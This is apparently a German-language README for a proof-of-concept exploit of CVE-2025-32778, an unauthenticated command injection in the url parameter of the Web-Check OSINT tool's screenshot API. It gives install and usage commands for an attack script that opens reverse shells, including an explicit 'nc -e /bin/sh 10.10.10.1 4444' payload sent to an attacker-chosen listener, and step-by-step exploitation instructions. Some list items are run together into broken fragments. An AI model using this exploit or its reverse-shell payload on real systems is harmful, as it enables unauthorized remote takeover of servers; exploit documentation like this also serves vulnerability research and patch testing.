
PoC-Exploit für CVE-2025-32778: Befehlsinjektion im OSINT-Tool Web-Check
CVE-2025-32778 ist eine kritische Sicherheitslücke zur Befehlseinschleusung im Web-Check OSINT-Tool von Lissy93.
Sie ermöglicht nicht authentifizierten Angreifern, über den url-Parameter in der Screenshot-API beliebige Systembefehle auszuführen.
Dieses Python-Skript automatisiert die Ausnutzung und kann Reverse Shells erzeugen oder benutzerdefinierte Shell-Payloads akzeptieren.
url-Befehlseinschleusung in Web-Check aus.--lhost und --lport.--shell.--shell mit --lhost/--lport.pip install requests
git clone https://github.com/00xCanelo/CVE-2025-32778
cd CVE-2025-32778
python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --lhost 10.10.10.1 --lport 4444
python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --shell "nc -e /bin/sh 10.10.10.1 4444"
python3 cve-2025-32778.py -h
Normalisieren Sie die Ziel-URL zu scheme://host[:port].
Bereiten Sie das Payload vor:
--lhost und --lport.--shell.Kodieren Sie das Shell-Payload für die sichere URL-Einschleusung.
Senden Sie eine HTTP-GET-Anfrage an /api/screenshot/ mit dem Payload.
Warten Sie auf die Reverse-Shell-Verbindung.
00xCanelo
GitHub Profile